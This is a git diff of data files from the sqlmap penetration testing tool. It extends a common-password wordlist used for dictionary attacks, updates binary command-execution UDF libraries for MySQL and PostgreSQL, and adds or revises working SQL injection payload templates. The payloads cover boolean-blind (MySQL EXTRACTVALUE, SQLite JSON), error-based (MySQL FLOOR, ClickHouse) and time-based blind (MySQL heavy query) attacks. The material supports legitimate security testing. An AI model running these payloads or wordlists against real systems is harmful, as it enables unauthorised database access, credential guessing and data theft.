+8031,20 @@ shuo shuttle shutup shyshy -si_informtn_schema sick sidekick +Sidekick sidney siemens sierra +Sierra +sifra +sifre sigma sigmachi signal signature +si_informtn_schema silence silent silly @@ -7809,6 +8076,7 @@ sinned sinner siobhan sirius +sisma sissy sister sister12 @@ -7824,7 +8092,9 @@ sixty sixty9 skate skater +skater1 skeeter +Skeeter skibum skidoo skiing @@ -7853,6 +8123,7 @@ slammer slapper slappy slapshot +slaptazodis slater slave slave1 @@ -7870,6 +8141,7 @@ slimshad slinky slip slipknot +slipknot1 slipknot666 slippery sloppy @@ -7900,6 +8172,7 @@ smoke1 smoker smokes smokey +Smokey smokey1 smokie smokin @@ -7929,6 +8202,7 @@ snooker snoop snoopdog snoopy +Snoopy snoopy1 snow snowball @@ -7997,6 +8271,7 @@ southern southpar southpark southpaw +southside1 sowhat soyhermosa space @@ -8014,6 +8289,7 @@ sparkle sparkles sparks sparky +Sparky sparky1 sparrow sparrows @@ -8034,6 +8310,7 @@ speed speedo speedway speedy +Speedy spence spencer spencer1 @@ -8045,6 +8322,7 @@ spider spider1 spiderma spiderman +spiderman1 spidey spierson spike @@ -8064,6 +8342,8 @@ spock spoiled sponge spongebo +spongebob +spongebob1 spooge spooky spoon @@ -8140,18 +8420,22 @@ starstar start start1 starter +startfinding startrek starwars +starwars1 state static station status +Status stayout stealth steel steele steeler steelers +steelers1 stefan stefanie stefano @@ -8165,14 +8449,17 @@ stephan stephane stephani stephanie +stephanie1 stephen stephen1 stephi stereo sterling +Sterling steve steve1 steven +Steven steven1 stevens stevie @@ -8216,9 +8503,9 @@ stranger strangle strap strat -strat_passwd stratford strato +strat_passwd stratus strawber strawberry @@ -8282,6 +8569,7 @@ suicide sullivan sultan summer +Summer summer1 summer69 summer99 @@ -8303,12 +8591,16 @@ sunnyday sunrise sunset sunshine +Sunshine +sunshine1 super super1 +super123 superb superfly superior superman +Superman superman1 supernov supersecret @@ -8337,6 +8629,7 @@ suzanne suzie suzuki suzy +Sverige svetlana swallow swanson @@ -8361,6 +8654,7 @@ swinging switch switzer swoosh +Swoosh sword swordfis swordfish @@ -8377,19 +8671,19 @@ symbol symmetry sympa synergy +synthimatiko syracuse sys -sys_stnt sysadm sysadmin sysman syspass +sys_stnt system system5 systempass systems syzygy -t-bone tab tabasco tabatha @@ -8424,6 +8718,7 @@ tara tardis targas target +target123 tarheel tarheels tarpon @@ -8436,13 +8731,16 @@ tata tatiana tattoo taurus +Taurus taxman taylor +Taylor taylor1 tazdevil tazman tazmania tbird +t-bone tbone tdos_icsap teacher @@ -8461,6 +8759,7 @@ teens teflon tekila tekken +Telechargement telecom telefon telefono @@ -8483,6 +8782,7 @@ tenerife teng tennesse tennis +Tennis tequiero tequila terefon @@ -8504,7 +8804,6 @@ test123 test1234 test2 test3 -test_user tester testi testing @@ -8512,6 +8811,7 @@ testing1 testpass testpilot testtest +test_user tetsuo texas texas1 @@ -8547,6 +8847,7 @@ theodore theone there theresa +Theresa therock therock1 these @@ -8560,6 +8861,7 @@ thirteen this thisisit thomas +Thomas thomas1 thompson thong @@ -8575,6 +8877,7 @@ thumb thumbs thumper thunder +Thunder thunder1 thunderb thunderbird @@ -8598,6 +8901,7 @@ tigercat tigers tigers1 tigger +Tigger tigger1 tigger2 tight @@ -8619,6 +8923,7 @@ ting tinker tinkerbe tinkerbell +tinkle tinman tintin tiny @@ -8798,12 +9103,15 @@ tuan tubas tucker tucson +tudelft tuesday +Tuesday tula tulips tuna tunafish tundra +tunnussana tupac turbine turbo @@ -8839,8 +9147,8 @@ ultima ultimate ultra um_admin -um_client umbrella +um_client umesh umpire undead @@ -8885,6 +9193,7 @@ username usmarine usmc usnavy +Usuckballz1 util utility utlestat @@ -8940,6 +9249,7 @@ veritas verizon vermont vernon +Vernon verona veronica veronika @@ -8957,6 +9267,8 @@ vicky victor victor1 victoria +Victoria +victoria1 victory video videouser @@ -8971,6 +9283,7 @@ vikram villa village vincent +Vincent vincent1 vinnie vintage @@ -9013,13 +9326,17 @@ vsegda vulcan vvvv vvvvvv +wachtwoord +wachtwurd waffle wagner +wagwoord waiting walden waldo walker wallace +wall.e wallet walleye wally @@ -9060,6 +9377,7 @@ water water1 waterboy waterloo +Waterloo waters watford watson @@ -9078,6 +9396,7 @@ webmaste webmaster webread webster +Webster wedding wedge weed @@ -9115,6 +9434,7 @@ wh whale1 what whatever +whatever1 whatnot whatsup whatthe @@ -9164,6 +9484,7 @@ williamsburg willie willis willow +Willow willy wilma wilson @@ -9172,6 +9493,7 @@ wind windmill window windows +Windows windsor windsurf winger @@ -9182,6 +9504,7 @@ winner winner1 winners winnie +Winnie winniethepooh winona winston @@ -9198,13 +9521,14 @@ wives wizard wizard1 wizards -wk_test wkadmin wkproxy wksys +wk_test wkuser wms wmsys +woaini wob wolf wolf1 @@ -9217,6 +9541,7 @@ wolfpac wolfpack wolverin wolverine +Wolverine wolves woman wombat @@ -9227,6 +9552,7 @@ wonderboy wood woodie woodland +Woodrow woodstoc woodwind woody @@ -9244,9 +9570,11 @@ work123 working workout world +World wormwood worship worthy +wow12345 wowwow wps wraith @@ -9271,17 +9599,17 @@ wwwwwww wwwwwwww wxcvbn wyoming -x-files -x-men xademo xanadu xander xanth xavier +xbox360 xcountry xdp xerxes xfer +x-files xfiles xian xiang @@ -9291,6 +9619,7 @@ ximenita xing xiong xla +x-men xmodem xnc xni @@ -9326,6 +9655,7 @@ yaya yeah yeahbaby yellow +yellow1 yellowstone yes yeshua @@ -9340,10 +9670,12 @@ yomama yong yosemite yoteamo +youbye123 young young1 -your_pass yourmom +yourmom1 +your_pass yousuck yoyo yoyoma @@ -9360,9 +9692,11 @@ yyyy yyyyyy yyyyyyyy yzerman +z123456 zachary zachary1 zack +zag12wsx zander zang zanzibar @@ -9409,12 +9743,14 @@ zipper zippo zippy zirtaeb +zk.: zmodem zodiac zoltan zombie zong zoomer +zoosk zorro zouzou zuan @@ -9424,9 +9760,12 @@ zxc123 zxccxz zxcv zxcvb +Zxcvb zxcvbn zxcvbnm +Zxcvbnm zxcvbnm1 +zxcvbnm123 zxcxz zxczxc zxzxzx diff --git a/data/txt/user-agents.txt b/data/txt/user-agents.txt index c90cd0b0e2b..c65829aa646 100644 --- a/data/txt/user-agents.txt +++ b/data/txt/user-agents.txt @@ -1,4 +1,4 @@ -# Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +# Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) # See the file 'LICENSE' for copying permission # Opera diff --git a/data/txt/wordlist.tx_ b/data/txt/wordlist.tx_ index 239b2a9abe2..f2b52c90658 100644 Binary files a/data/txt/wordlist.tx_ and b/data/txt/wordlist.tx_ differ diff --git a/data/udf/mysql/linux/32/lib_mysqludf_sys.so_ b/data/udf/mysql/linux/32/lib_mysqludf_sys.so_ index f401c800406..bfd4440ba5f 100644 Binary files a/data/udf/mysql/linux/32/lib_mysqludf_sys.so_ and b/data/udf/mysql/linux/32/lib_mysqludf_sys.so_ differ diff --git a/data/udf/mysql/linux/64/lib_mysqludf_sys.so_ b/data/udf/mysql/linux/64/lib_mysqludf_sys.so_ index f442d1f14de..1992ed0347e 100644 Binary files a/data/udf/mysql/linux/64/lib_mysqludf_sys.so_ and b/data/udf/mysql/linux/64/lib_mysqludf_sys.so_ differ diff --git a/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ b/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ index 17814b6ba53..bb8ec366d4c 100644 Binary files a/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ and b/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ differ diff --git a/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ b/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ index 33a7adbe0c5..97799b69d4d 100644 Binary files a/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ and b/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ differ diff --git a/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ index f7e6da36499..33dbdeeb35b 100644 Binary files a/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ index 3b030e70b1f..c56d766209a 100644 Binary files a/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ index 7c72515a892..3fb236e2644 100644 Binary files a/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ index 43f7cdc55d9..d734fff00ae 100644 Binary files a/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ index 2c49149d0d5..da50fa8eafc 100644 Binary files a/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ index f463ee7543d..83732d33298 100644 Binary files a/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ index 147039a2542..ee1ca8ccef1 100644 Binary files a/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ index cf56372ea9a..ab7e7456223 100644 Binary files a/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ index 8ec4566eb7b..5314a0a3886 100644 Binary files a/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ index 310f838de53..da9d0a7f6f7 100644 Binary files a/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_ index 504be8277e3..1100ab820fd 100644 Binary files a/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_ index 2e19b356e14..f9396a86aa5 100644 Binary files a/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_ index ee94408ecd4..21bbddcf59e 100644 Binary files a/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_ index 8a61270ca7a..9327b1cdba3 100644 Binary files a/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_ index b1258cbe9a4..a9874449464 100644 Binary files a/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ index 2c2e96ca70a..e4b124fc8b3 100644 Binary files a/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ index 2db355e267e..2c22afae9a2 100644 Binary files a/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ index 1335862f761..ab23ee6a749 100644 Binary files a/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ index bb2b6f195b5..8dae29c8336 100644 Binary files a/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ index c730910de82..e5d05fc6f16 100644 Binary files a/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ index 6ddad36fa41..ff31df61499 100644 Binary files a/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ index 0f9bdf36280..d5576fdd8cf 100644 Binary files a/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ index 0f54d5136c7..2350427f4ac 100644 Binary files a/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_ index a5bdf892ddc..eae84bdadd0 100644 Binary files a/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ index bbe6aabf672..4a408a1ae0c 100644 Binary files a/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ and b/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ b/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ index a05e36e8c95..40f838b30f5 100644 Binary files a/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ and b/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ differ diff --git a/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ b/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ index 7a03c0d0def..a9b4b48c7b7 100644 Binary files a/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ and b/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ differ diff --git a/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ b/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ index eac654286bc..06aee54d778 100644 Binary files a/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ and b/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ differ diff --git a/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ b/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ index 6bfd62c07d4..67b5d34976f 100644 Binary files a/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ and b/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ differ diff --git a/data/xml/banner/generic.xml b/data/xml/banner/generic.xml index 555981e86d4..fc2fb97f59a 100644 --- a/data/xml/banner/generic.xml +++ b/data/xml/banner/generic.xml @@ -34,7 +34,7 @@ - + diff --git a/data/xml/banner/server.xml b/data/xml/banner/server.xml index a499bcd204d..4d99cade0bd 100644 --- a/data/xml/banner/server.xml +++ b/data/xml/banner/server.xml @@ -3,14 +3,14 @@ - + @@ -97,6 +97,10 @@ + + + + @@ -163,6 +167,10 @@ + + + + @@ -315,7 +323,11 @@ - + + + + + @@ -436,8 +448,12 @@ + + + + - + @@ -756,7 +772,7 @@ - + @@ -858,7 +874,15 @@ - + + + + + + + + + diff --git a/data/xml/banner/set-cookie.xml b/data/xml/banner/set-cookie.xml index a9d8143d8b2..419a436445a 100644 --- a/data/xml/banner/set-cookie.xml +++ b/data/xml/banner/set-cookie.xml @@ -62,4 +62,32 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/data/xml/boundaries.xml b/data/xml/boundaries.xml index fb41a83c093..20bf0d10315 100644 --- a/data/xml/boundaries.xml +++ b/data/xml/boundaries.xml @@ -554,6 +554,15 @@ Formats: + + 5 + 7 + 1 + 3 + [RANDSTR1], + [RANDSTR2] + + 4 diff --git a/data/xml/errors.xml b/data/xml/errors.xml index de6786dc99f..dda262765b9 100644 --- a/data/xml/errors.xml +++ b/data/xml/errors.xml @@ -15,7 +15,6 @@ - @@ -199,6 +198,7 @@ + @@ -210,6 +210,11 @@ + + + + + diff --git a/data/xml/payloads/boolean_blind.xml b/data/xml/payloads/boolean_blind.xml index 67cf9940d10..ae8b6de95f2 100644 --- a/data/xml/payloads/boolean_blind.xml +++ b/data/xml/payloads/boolean_blind.xml @@ -484,18 +484,18 @@ Tag: - MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int) + MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) 1 5 1 1,2,3,8 1 - AND ([INFERENCE])*[RANDNUM] + AND EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END) - AND ([RANDNUM]=[RANDNUM])*[RANDNUM1] + AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END) - AND ([RANDNUM]=[RANDNUM1])*[RANDNUM1] + AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END)
MySQL @@ -503,18 +503,18 @@ Tag: - MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int) + MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) 1 5 3 - 1,2,3 + 1,2,3,8 2 - OR ([INFERENCE])*[RANDNUM] + OR EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END) - OR ([RANDNUM]=[RANDNUM])*[RANDNUM1] + OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END) - OR ([RANDNUM]=[RANDNUM1])*[RANDNUM1] + OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END)
MySQL @@ -596,6 +596,45 @@ Tag: Oracle
+ + + SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON) + 1 + 2 + 1 + 1 + 1 + AND CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END + + AND CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END + + + AND CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END + +
+ SQLite +
+ + + + SQLite OR boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON) + 1 + 3 + 3 + 1 + 2 + OR CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END + + OR CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END + + + OR CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END + +
+ SQLite +
+ + diff --git a/data/xml/payloads/error_based.xml b/data/xml/payloads/error_based.xml index f9505522f38..0d717f96170 100644 --- a/data/xml/payloads/error_based.xml +++ b/data/xml/payloads/error_based.xml @@ -221,6 +221,26 @@
+ + MySQL >= 5.0 (inline) error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + 2 + 5 + 1 + 7 + 1 + (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.0 +
+ + MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) 2 @@ -838,7 +858,7 @@ IBM DB2 OR error-based - WHERE or HAVING clause 2 4 - 1 + 3 1 1 OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') @@ -853,6 +873,44 @@ + + ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause + 2 + 3 + 1 + 1,2,3,9 + 1 + AND [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]') + + AND [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ ClickHouse +
+ + + + ClickHouse OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause + 2 + 4 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]') + + OR [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ ClickHouse +
+ + diff --git a/data/xml/payloads/stacked_queries.xml b/data/xml/payloads/stacked_queries.xml index b7df99fdaec..b431bb7849f 100644 --- a/data/xml/payloads/stacked_queries.xml +++ b/data/xml/payloads/stacked_queries.xml @@ -85,7 +85,7 @@ - MySQL < 5.0.12 stacked queries (heavy query - comment) + MySQL < 5.0.12 stacked queries (BENCHMARK - comment) 4 3 2 @@ -105,7 +105,7 @@ - MySQL < 5.0.12 stacked queries (heavy query) + MySQL < 5.0.12 stacked queries (BENCHMARK) 4 5 2 @@ -486,7 +486,7 @@ IBM DB2 stacked queries (heavy query - comment) - 5 + 4 3 2 1-8 @@ -506,7 +506,7 @@ IBM DB2 stacked queries (heavy query) - 5 + 4 5 2 1-8 @@ -607,7 +607,7 @@ SAP MaxDB stacked queries (heavy query - comment) - 5 + 4 4 2 1-8 @@ -627,7 +627,7 @@ SAP MaxDB stacked queries (heavy query) - 5 + 4 5 2 1-8 diff --git a/data/xml/payloads/time_blind.xml b/data/xml/payloads/time_blind.xml index 033d9fd37fc..21a50ce4016 100644 --- a/data/xml/payloads/time_blind.xml +++ b/data/xml/payloads/time_blind.xml @@ -169,7 +169,7 @@ - MySQL < 5.0.12 AND time-based blind (heavy query) + MySQL < 5.0.12 AND time-based blind (BENCHMARK) 5 2 2 @@ -189,7 +189,27 @@ - MySQL < 5.0.12 OR time-based blind (heavy query) + MySQL > 5.0.12 AND time-based blind (heavy query) + 5 + 3 + 2 + 1,2,3,8,9 + 1 + AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM]) + + AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1) + + + + +
+ MySQL + > 5.0.12 +
+ + + + MySQL < 5.0.12 OR time-based blind (BENCHMARK) 5 2 3 @@ -209,7 +229,27 @@ - MySQL < 5.0.12 AND time-based blind (heavy query - comment) + MySQL > 5.0.12 OR time-based blind (heavy query) + 5 + 3 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM]) + + OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1) + + + + +
+ MySQL + > 5.0.12 +
+ + + + MySQL < 5.0.12 AND time-based blind (BENCHMARK - comment) 5 5 2 @@ -230,7 +270,28 @@ - MySQL < 5.0.12 OR time-based blind (heavy query - comment) + MySQL > 5.0.12 AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM]) + + AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1) + # + + + + +
+ MySQL + > 5.0.12 +
+ + + + MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment) 5 5 3 @@ -250,6 +311,27 @@ + + MySQL > 5.0.12 OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM]) + + OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1) + # + + + + +
+ MySQL + > 5.0.12 +
